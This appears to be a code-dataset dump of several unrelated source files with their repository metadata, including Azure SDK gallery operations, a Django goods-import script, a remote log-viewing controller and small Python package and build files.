def _construct_checkpoint_path_name(checkpoint_id: int) -> str:
return f"checkpoint_{checkpoint_id:06d}"
| [
"[email protected]"
] | |
50d7896ca2a3fd81c7a3a5b423c105fc094df359 | 0f2112a0e198cb0275c002826854c836bbfb5bdf | /pywicta/image/__init__.py | ebc8b9794d95d617edc05784841fc62efa089799 | [
"MIT"
] | permissive | jeremiedecock/pywi-cta | a7f98ae59beb1adecb25623153c13e5bc70e5560 | 1185f7dfa48d60116472c12ffc423be78a250fc9 | refs/heads/master | 2021-04-15T12:06:03.723786 | 2019-03-21T02:33:15 | 2019-03-21T02:33:15 | 126,397,380 | 0 | 1 | MIT | 2018-10-16T12:17:52 | 2018-03-22T21:31:45 | Python | UTF-8 | Python | false | false | 158 | py | """Image functions
This package contains additional image processing functions.
"""
from . import hillas_parameters
from . import signal_to_border_distance
| [
"[email protected]"
] | |
936ac1a26cc0f0c3c4098e4dab5068c152183601 | 786de89be635eb21295070a6a3452f3a7fe6712c | /root/tags/V00-03-00/SConscript | 79a8398cab91d01f66746f757727ba8c866b37e9 | [] | no_license | connectthefuture/psdmrepo | 85267cfe8d54564f99e17035efe931077c8f7a37 | f32870a987a7493e7bf0f0a5c1712a5a030ef199 | refs/heads/master | 2021-01-13T03:26:35.494026 | 2015-09-03T22:22:11 | 2015-09-03T22:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | #--------------------------------------------------------------------------
# File and Version Information:
# $Id$
#
# Description:
# SConscript file for package root
#------------------------------------------------------------------------
# Do not delete following line, it must be present in
# SConscript file for any SIT project
Import('*')
from os.path import join as pjoin
from SConsTools.standardExternalPackage import standardExternalPackage
#
# For the standard external packages which contain includes, libraries,
# and applications it is usually sufficient to call standardExternalPackage()
# giving some or all parameters.
#
root_ver = "5.34.25"
PREFIX = pjoin('$SIT_EXTERNAL_SW', "root", root_ver + "-$PYTHON")
INCDIR = "include/root"
LIBDIR = "lib"
LINKLIBS = "lib*.so*"
PKGLIBS = "Core Cint RIO Net Hist Graf Graf3d Gpad Tree Rint Postscript Matrix Physics MathCore Thread m dl"
BINDIR = "bin"
LINKBINS = "root root.exe rootcint root-config"
PYDIR = "lib"
LINKPY = "*.py libPyROOT.so*"
standardExternalPackage('root', **locals())
| [
"[email protected]@b967ad99-d558-0410-b138-e0f6c56caec7"
] | [email protected]@b967ad99-d558-0410-b138-e0f6c56caec7 |
|
38a7fca7aa7911336a605a76d7fe26a7822d15be | 0a2cc497665f2a14460577f129405f6e4f793791 | /sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2018_06_01/aio/operations/_galleries_operations.py | 78b2fc6273345d2b9c8cba61fa9f1031eb1862b9 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | hivyas/azure-sdk-for-python | 112158aa9e1dd6e30cf6b3dde19f5db6ea2a577b | 8b3258fa45f5dc25236c22ad950e48aa4e1c181c | refs/heads/master | 2023-06-17T12:01:26.392186 | 2021-05-18T19:56:01 | 2021-05-18T19:56:01 | 313,761,277 | 1 | 1 | MIT | 2020-12-02T17:48:22 | 2020-11-17T22:42:00 | Python | UTF-8 | Python | false | false | 23,103 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class GalleriesOperations:
"""GalleriesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2018_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _create_or_update_initial(
self,
resource_group_name: str,
gallery_name: str,
gallery: "_models.Gallery",
**kwargs
) -> "_models.Gallery":
cls = kwargs.pop('cls', None) # type: ClsType["_models.Gallery"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'galleryName': self._serialize.url("gallery_name", gallery_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(gallery, 'Gallery')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Gallery', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('Gallery', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('Gallery', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
gallery_name: str,
gallery: "_models.Gallery",
**kwargs
) -> AsyncLROPoller["_models.Gallery"]:
"""Create or update a Shared Image Gallery.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param gallery_name: The name of the Shared Image Gallery. The allowed characters are alphabets
and numbers with dots and periods allowed in the middle. The maximum length is 80 characters.
:type gallery_name: str
:param gallery: Parameters supplied to the create or update Shared Image Gallery operation.
:type gallery: ~azure.mgmt.compute.v2018_06_01.models.Gallery
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Gallery or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2018_06_01.models.Gallery]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Gallery"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
gallery_name=gallery_name,
gallery=gallery,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('Gallery', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'galleryName': self._serialize.url("gallery_name", gallery_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}'} # type: ignore
async def get(
self,
resource_group_name: str,
gallery_name: str,
**kwargs
) -> "_models.Gallery":
"""Retrieves information about a Shared Image Gallery.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param gallery_name: The name of the Shared Image Gallery.
:type gallery_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Gallery, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2018_06_01.models.Gallery
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Gallery"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'galleryName': self._serialize.url("gallery_name", gallery_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Gallery', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
gallery_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'galleryName': self._serialize.url("gallery_name", gallery_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
gallery_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Delete a Shared Image Gallery.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param gallery_name: The name of the Shared Image Gallery to be deleted.
:type gallery_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
gallery_name=gallery_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'galleryName': self._serialize.url("gallery_name", gallery_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.GalleryList"]:
"""List galleries under a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either GalleryList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2018_06_01.models.GalleryList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.GalleryList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('GalleryList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries'} # type: ignore
def list(
self,
**kwargs
) -> AsyncIterable["_models.GalleryList"]:
"""List galleries under a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either GalleryList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2018_06_01.models.GalleryList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.GalleryList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('GalleryList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/galleries'} # type: ignore
| [
"[email protected]"
] | |
afbec97b1c9d34f73ceab3845b07f37693580dcc | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nncolman.py | b4eb8ea4b99751f343c4618a341e4a0f9d07a3cc | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 64 | py | ii = [('WadeJEB.py', 4), ('ClarGE3.py', 15), ('HogaGMM2.py', 7)] | [
"[email protected]"
] | |
47aedceb25e986a3e5d3aae64be46cd960624d18 | 81f128c1d3ffc57ea35053a0f42bc3adb8ac820d | /MxShop/db_tools/import_goods_data.py | 71e3cfa1b711929ae1f857f0ba8333e70073b35b | [] | no_license | tminlun/tminlun-MxShop | f06816b5f596cffb7fa634891a70567055de1bf9 | a1ccf4b05edd8b47ad716fe65072b5be6e501e50 | refs/heads/master | 2022-12-10T11:08:28.043339 | 2019-04-15T15:12:44 | 2019-04-15T15:12:44 | 176,200,320 | 0 | 0 | null | 2022-12-08T01:43:02 | 2019-03-18T03:47:29 | Python | UTF-8 | Python | false | false | 2,099 | py | # _*_ encoding:utf-8 _*_
__author__: '田敏伦'
__date__: '2019/2/27 0027 20:38'
# 导入goods的数据
import sys
import os
pwd = os.path.dirname(os.path.realpath(__file__))
sys.path.append(pwd + "../")
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MxShop.settings')
import django
django.setup()
from db_tools.data.product_data import row_data
from goods.models import Goods,GoodsCategory,GoodsImage
for goods_detail in row_data:
goods = Goods()
goods.name = goods_detail["name"]
# replace("¥", "")把¥替换成 ""
goods.market_price = float(int(goods_detail["market_price"].replace("¥", "").replace("元", "")))
goods.shop_price = float(int(goods_detail["sale_price"].replace("¥", "").replace("元", "")))
# 如果内容不为None传递给goods_brief ,否则: else(为None) 把None转换为"",传递给goods_brief
goods.goods_brief = goods_detail["desc"] if goods_detail["desc"] is not None else ""
goods.goods_desc = goods_detail["goods_desc"] if goods_detail["goods_desc"] is not None else ""
# 取第一张作为封面图 [如果有就传递值,如果没有(else)传递""。image在数据库默认为str ]
goods.goods_front_image = goods_detail["images"][0] if goods_detail["images"] else ""
# 取第三级分类,作为商品的分类
category_name = goods_detail["categorys"][-1]
# 选用filter不用get。因为filter没有匹配的返回空字符串,不会抛异常,get会抛异常(只能传外键给goods.category,直接传str会出错)
category = GoodsCategory.objects.filter(name=category_name)
print(category[0]) # category是一个对象,goods.category需要字符串,category[0]返回对象的字符串
if category:
goods.category = category[0] # 当前数据的商品的分类
goods.save()
# 商品的图片
for good_image in goods_detail["images"]:
goods_image_instance = GoodsImage()
goods_image_instance.image = good_image
goods_image_instance.goods = goods # 上面有遍历每一个goods
goods_image_instance.save() | [
"[email protected]"
] | |
a95902c6e18ce1bc91769f463fdcadd5edc5103a | b776894e97c2cedb791cb6d860865908d13b6fa9 | /op_app/Controllers/logDetailControllerClass.py | 87f3670e671f689c175562fb968b544499703355 | [] | no_license | yezimai/v11 | 30463acf9cd4c2b9bd43eb0c722947804a08c36e | a4029afb169962b0f041ac2dc9e5c03a61cba8ee | refs/heads/master | 2021-09-04T00:32:13.951114 | 2018-01-13T10:05:39 | 2018-01-13T10:05:39 | 116,007,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,704 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from op_app.logger.log import runlog
from op_app.Model.base.baseModelClass import BaseDbModelClass
from op_app.Model.base.operation_dbModelClass import Operation_dbModelClass
from op_app.logger.log import dblog, runlog
from op_app.lib import appConfigDetailClass, pub
import json
from op_app.Extends.paramikoTool import ParamikoTool
import os
import sys
class LogDetailControllerClass(object):
def __init__(self, request):
# super(LogDetailControllerClass, self).__init__()
self.request = request
self.uid = self.request.user.id
self.project_id = self.request.GET.get('project_id', '')
self.env_id = self.request.GET.get('env_id', '')
self.app_id = self.request.GET.get('app_id', '')
self.ip = self.request.GET.get('ip', '')
self.server_type = self.request.GET.get('server_type', '')
self.server_id = self.request.GET.get('server_id', '')
self.action = self.request.GET.get('action', '')
self.line_num = self.request.GET.get('line_num', '100')
def getLogDetail(self):
# 判断前端传来的参数
if self.project_id == '' or self.env_id == '' or self.app_id == '' or self.ip == ''\
or self.action == ''or self.server_type == '' or self.server_id == '':
# print('p_id,e_id,a_id,ip,action,server_type,server_id,',self.project_id,self.env_id,self.app_id,self.ip,self.action,self.server_type,self.server_id)
print('invaild action args from web...')
runlog.error("[ERROR] --wrong action args from web-----, Catch exception:, file: [ %s ], line: [ %s ]"
%(__file__,sys._getframe().f_lineno))
return 'invaild action args from web...'
else:
#判断用户是否有权限,没有权限返回判断结果
if not pub.hasAccessPermission(self.uid, self.server_type, self.server_id):
return 'no permissions to view'
# 获取app的用户名和密码
instance = appConfigDetailClass.appConfigDetail()
res, status = instance.AppConfigDetail(self.server_type, self.app_id, self.server_id, self.env_id, self.project_id)
print('logapp--res',res)
if not status:
runlog.error("the APP Data is null, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
res_dic = dict()
for i in res:
res_dic['install_user'] = i[1]
res_dic['app_type'] = i[2]
res_dic['appdir'] = i[3]
res_dic['app_name'] = i[6]
res_dic['pass'] = i[7]
res_dic['sshport'] = i[8]
res_dic['sshuser'] = i[9]
# 获取远程服务器日志目录指定行数的内容
# print('dict_res',res_dic)
if res_dic['app_type'] == '1': # app类型是tomcat
if self.action == 'start':
log_file_path = '{}/logs/catalina.out'.format(res_dic['appdir'])
# print('00---00',log_file_path)
elif self.action == 'stop':
log_file_path = '/home/{}/service_manage/{}/scripts/log/stopapp.sh.log'.format(\
res_dic['sshuser'], res_dic['app_name'])
elif self.action == 'log_show':
logdir_id = self.request.GET.get('logdir_id', '')
file_name = self.request.GET.get('file_name','')
print('nnnnnnnnnnnn',logdir_id,file_name)
if logdir_id == '' or file_name == '':
runlog.error("the logdir_id or filename is null, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
return 'invaild logdir_id to find the logfile'
# 找到app对应的日志目录
log_dir = instance.app_LogDir(self.app_id, self.server_type, self.server_id, logdir_id)
if len(log_dir) == 0:
runlog.error("the logdir is null, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
return 'invaild logdir to find the logfile'
log_file_path = '{}/{}'.format(log_dir[0][0],file_name)
print('logggggggg',log_file_path)
else:
runlog.error("the APP type is not tomcat, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
return 'invaild action to find the logfile'
pt = ParamikoTool() # 实例化对象后,获取日志默认行数
log_res = pt.getlogrow(self.ip, res_dic['sshport'], res_dic['sshuser'], \
res_dic['pass'], log_file_path, self.line_num)
# print('-------------',log_res)
# 记录用户访问记录
audit_log = Operation_dbModelClass()
audit_log.inserToLog(self.request.user.username, self.ip, 'access', self.request.path, log_file_path)
return log_res
else:
runlog.info("the APP type is not tomcat, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
return 'just for app-type like tomcat..'
def logDir(self):
# 返回的字典格式
data = {
'project_id': self.project_id,
'env_id': self.env_id,
'app_id': self.app_id,
'server_type': self.server_type,
'server_id': self.server_id,
'ip': self.ip,
}
if self.app_id == '':
runlog.error("[ERROR] -getlogdir-wrong action args from web-----, Catch exception:, file: [ %s ], line: [ %s ]"
%(__file__,sys._getframe().f_lineno))
if not pub.hasAccessPermission(self.uid, self.server_type, self.server_id):
return ['no permissions to view']
# 获取app的用户名和密码
instance = appConfigDetailClass.appConfigDetail()
res, status= instance.AppConfigDetail(self.server_type, self.app_id, self.server_id, self.env_id,
self.project_id)
print('logapp--res', res)
if not status:
runlog.error("the APP Data is null, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
data['user'] = res[0][1]
res_dir = instance.whole_appLogDirs(self.app_id, self.server_type, self.server_id) # 通过appid查找出对应的所有的日志目录
print('whole_appLogDirs------>\033[42;1m%s\033[0m' % res_dir)
if len(res_dir) == 0:
print('nono is logdir...')
return {}
res_list = []
for i in res_dir:
res_dic = dict()
res_dic['id'] = i[1]
res_dic['dir'] = i[0]
res_list.append(res_dic)
data['logdirs'] = res_list
return data
def getlogInfo(self): # 获取app日志目录下所有日志的详细信息,大小,拥有者,修改时间等
logdir_id = self.request.GET.get('logdir_id', '')
# 判断前端传来的参数
if self.project_id == '' or self.env_id == '' or self.app_id == '' or self.ip == ''\
or self.server_type == '' or self.server_id == '' or logdir_id == '':
# print(self.project_id,self.env_id,self.app_id,self.ip,self.server_type,self.server_id,logdir_id)
# print('getLogInfo-error-invaild action args from web...')
runlog.error("[ERROR] -getLogInfo-error-wrong action args from web-----, Catch exception:, file: [ %s ], line: [ %s ]"
%(__file__,sys._getframe().f_lineno))
return 'invaild action args from web...'
if not pub.hasAccessPermission(self.uid, self.server_type, self.server_id):
runlog.error("[ERROR] --no permission-----, Catch exception:, file: [ %s ], line: [ %s ]"
%(__file__,sys._getframe().f_lineno))
return {}
instance = appConfigDetailClass.appConfigDetail()
res_dir = instance.app_LogDir(self.app_id, self.server_type, self.server_id, logdir_id)
if len(res_dir) == 0:
return {}
# 获取app的用户名和密码
instance = appConfigDetailClass.appConfigDetail()
res, Status = instance.AppConfigDetail(self.server_type, self.app_id, self.server_id, self.env_id,
self.project_id)
#print('pppppppppppplogapp--res', res)
if not Status:
runlog.error("the APP Data is null, file: [ %s ], line: [ %s ]" % (
__file__, sys._getframe().f_lineno))
pk = ParamikoTool() # 实例化对象,调用方法后将文件大小按时间排序展示
data_res, status = pk.getDirInfo(self.ip, res[0][8], res[0][9], res[0][7], res_dir[0][0])
# '''data='-rw-rw-r-- 1 beehive beehive 22900 Feb 8 2017 catalina.2017-02-08.log\n
# -rw-rw-r-- 1 beehive beehive 171910 Feb 9 2017 catalina.2017-02-09.log\n
#print('2222data_res------>\033[31;1m%s\033[0m' % data_res)
if not status:
runlog.error("getDirInfo is null, file: [ %s ], line: [ %s ],error:[ %s ]" % (
__file__, sys._getframe().f_lineno, data_res))
final_data_dic = dict() # 将得到的结果按字典的格式返回
final_data_dic['data'] = data_res
return final_data_dic
| [
"[email protected]"
] | |
150031906408644576efe4932f757a1e0abf4fa8 | ddddaa700e4642f46a2c1e1e0271a7c8ea62ba0f | /harness/determined/cli/sso.py | 026b6b502e98d88856d356e481ab9bf2cf8167e6 | [
"Apache-2.0"
] | permissive | determined-ai/determined | 9d563cb5ffd074c88ee5edc9bf22ab9c3cb78c7e | 8239b1993f4f44390f4e88901ffaf3b12429b83c | refs/heads/main | 2023-08-21T12:13:36.651298 | 2023-08-21T08:34:16 | 2023-08-21T08:34:16 | 253,846,879 | 2,531 | 330 | Apache-2.0 | 2023-09-14T21:54:17 | 2020-04-07T16:12:29 | Go | UTF-8 | Python | false | false | 5,240 | py | import sys
import webbrowser
from argparse import Namespace
from getpass import getpass
